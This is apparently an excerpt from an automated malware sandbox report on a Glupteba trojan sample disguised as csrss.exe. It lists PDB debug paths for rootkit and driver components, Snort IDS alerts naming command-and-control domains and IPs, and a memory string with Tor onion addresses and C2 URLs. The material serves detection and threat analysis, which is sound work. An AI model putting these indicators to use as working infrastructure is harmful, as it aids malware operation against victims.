        Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: symsrv.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004578000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
        Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Core.ni.pdb source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp
        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Numerics.ni.pdb source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
        Source: Binary string: System.Transactions.ni.pdbRSDSc source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
        Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Management.ni.pdbRSDSJ< source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: symsrv.pdbGCTL source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004578000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: EfiGuardDxe.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
        Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: dbghelp.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: dbghelp.pdbGCTL source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Loader.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: powershell.exe, 00000035.00000002.209085027998.000000006B5CD000.00000020.00000001.01000000.00000014.sdmp
        Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Data.ni.pdb source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
        Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Numerics.ni.pdbRSDSautg source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
        Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Unable to locate the .pdb file in this location source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
        Source: Binary string: The module signature does not match with .pdb signature. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: .pdb.dbg source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: '(EfiGuardDxe.pdbx source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: ZZC:\winirun92 cedojuhexoy.pdb source: kdsyitkxmS.exe, 00000004.00000001.208199622621.0000000000401000.00000020.00000001.01000000.00000004.sdmp, kdsyitkxmS.exe, 0000000A.00000001.208335995035.0000000000401000.00000020.00000001.01000000.00000004.sdmp, csrss.exe, 00000014.00000001.208684568909.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000017.00000001.208779570930.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000001F.00000001.208811296233.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000028.00000001.208833898384.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000002B.00000001.208860836082.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000032.00000001.208896227050.0000000000401000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: System.Management.pdb source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
        Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Data.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
        Source: Binary string: System.Management.ni.pdb source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp
        Source: Binary string: or you do not have access permission to the .pdb location. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Transactions.pdb source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
        Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Transactions.ni.pdb source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
        Source: Binary string: C:\winirun92 cedojuhexoy.pdb source: kdsyitkxmS.exe, 00000004.00000001.208199622621.0000000000401000.00000020.00000001.01000000.00000004.sdmp, kdsyitkxmS.exe, 0000000A.00000001.208335995035.0000000000401000.00000020.00000001.01000000.00000004.sdmp, csrss.exe, 00000014.00000001.208684568909.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000017.00000001.208779570930.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000001F.00000001.208811296233.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000028.00000001.208833898384.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000002B.00000001.208860836082.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000032.00000001.208896227050.0000000000401000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: System.Numerics.pdb source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
        Source: Binary string: System.Core.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2043048 ET TROJAN Observed Glupteba CnC Domain (duniadekho .bar in TLS SNI) 192.168.11.20:49990 -> 185.82.216.50:443
        Source: TrafficSnort IDS: 2045697 ET TROJAN DNS Query to Glupteba Domain (twopixis .com) 192.168.11.20:49827 -> 1.1.1.1:53
        Source: TrafficSnort IDS: 2043048 ET TROJAN Observed Glupteba CnC Domain (duniadekho .bar in TLS SNI) 192.168.11.20:49993 -> 185.82.216.50:443
        Source: TrafficSnort IDS: 2043048 ET TROJAN Observed Glupteba CnC Domain (duniadekho .bar in TLS SNI) 192.168.11.20:49998 -> 185.82.216.50:443
        Source: TrafficSnort IDS: 2043048 ET TROJAN Observed Glupteba CnC Domain (duniadekho .bar in TLS SNI) 192.168.11.20:50002 -> 185.82.216.50:443
        Source: TrafficSnort IDS: 2043048 ET TROJAN Observed Glupteba CnC Domain (duniadekho .bar in TLS SNI) 192.168.11.20:50007 -> 185.82.216.50:443
        Source: TrafficSnort IDS: 2045697 ET TROJAN DNS Query to Glupteba Domain (twopixis .com) 192.168.11.20:63997 -> 1.1.1.1:53
        Found Tor onion address
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p 